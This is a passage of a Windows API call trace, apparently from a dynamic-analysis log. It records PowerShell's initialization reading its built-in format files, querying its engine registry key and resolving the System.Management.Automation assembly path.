[0079.714] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.714] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x6f94b862, Data2=0x62d1, Data3=0x4afd, Data4=([0]=0xaa, [1]=0xce, [2]=0x72, [3]=0xdf, [4]=0xd5, [5]=0x16, [6]=0xef, [7]=0xc1))) returned 0x0
[0079.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.714] SetErrorMode (uMode=0x1) returned 0x1
[0079.715] SetErrorMode (uMode=0x1) returned 0x1
[0079.715] GetFileType (hFile=0x30c) returned 0x1
[0079.720] ReadFile (in: hFile=0x30c, lpBuffer=0x35159b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x35159b8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.720] ReadFile (in: hFile=0x30c, lpBuffer=0x35159b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x35159b8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.721] ReadFile (in: hFile=0x30c, lpBuffer=0x35159b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x35159b8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.721] ReadFile (in: hFile=0x30c, lpBuffer=0x35159b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x35159b8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.721] ReadFile (in: hFile=0x30c, lpBuffer=0x35159b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x35159b8*, lpNumberOfBytesRead=0x10cd18*=0x119, lpOverlapped=0x0) returned 1
[0079.721] ReadFile (in: hFile=0x30c, lpBuffer=0x35159b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x35159b8*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.721] SetErrorMode (uMode=0x1) returned 0x1
[0079.721] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
[0079.721] SetErrorMode (uMode=0x1) returned 0x1
[0079.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.722] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.722] CoTaskMemAlloc (cb=0x5a) returned 0x24d1a0
[0079.722] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d1a0, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.722] CoTaskMemFree (pv=0x24d1a0)
[0079.722] RegCloseKey (hKey=0x30c) returned 0x0
[0079.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.723] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.723] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x3a1a17b8, Data2=0xabd0, Data3=0x4cb1, Data4=([0]=0xb4, [1]=0xb4, [2]=0x22, [3]=0xaf, [4]=0xd6, [5]=0xa6, [6]=0xed, [7]=0x95))) returned 0x0
[0079.723] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.723] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x2f60deba, Data2=0xf59e, Data3=0x404a, Data4=([0]=0xb5, [1]=0xa3, [2]=0x93, [3]=0xd4, [4]=0x14, [5]=0x3c, [6]=0x23, [7]=0x33))) returned 0x0
[0079.724] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xec04041e, Data2=0x80a, Data3=0x4ba8, Data4=([0]=0x85, [1]=0xd4, [2]=0x45, [3]=0xca, [4]=0x5a, [5]=0xdf, [6]=0x23, [7]=0x5b))) returned 0x0
[0079.724] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x8c0f96ab, Data2=0x5c93, Data3=0x404d, Data4=([0]=0x84, [1]=0x5c, [2]=0xcb, [3]=0x29, [4]=0x2f, [5]=0xf9, [6]=0x9a, [7]=0xaa))) returned 0x0
[0079.724] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.724] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.724] SetErrorMode (uMode=0x1) returned 0x1
[0079.724] SetErrorMode (uMode=0x1) returned 0x1
[0079.724] GetFileType (hFile=0x30c) returned 0x1
[0079.735] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.735] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.735] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.736] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.736] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.736] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.736] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.737] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.737] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.737] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.737] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.737] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.737] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.738] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.739] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.739] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.739] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.740] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.741] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.741] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.741] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.741] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.741] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.741] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.743] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.743] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.744] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.744] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.744] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.744] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.744] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.744] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.745] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.745] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.745] ReadFile (in: hFile=0x30c, lpBuffer=0x3571b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3571b58*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.757] SetErrorMode (uMode=0x1) returned 0x1
[0079.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
[0079.800] SetErrorMode (uMode=0x1) returned 0x1
[0079.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.800] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.800] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.800] CoTaskMemAlloc (cb=0x5a) returned 0x24d1a0
[0079.800] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d1a0, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.800] CoTaskMemFree (pv=0x24d1a0)
[0079.800] RegCloseKey (hKey=0x30c) returned 0x0
[0079.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.807] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x14f46dff, Data2=0xc369, Data3=0x47fc, Data4=([0]=0x9b, [1]=0x8d, [2]=0xab, [3]=0xac, [4]=0x5e, [5]=0x72, [6]=0x49, [7]=0xd0))) returned 0x0
[0079.807] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xbfefc539, Data2=0x43a2, Data3=0x4585, Data4=([0]=0xab, [1]=0xa8, [2]=0xea, [3]=0xa5, [4]=0xe1, [5]=0x1, [6]=0x37, [7]=0xef))) returned 0x0
[0079.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
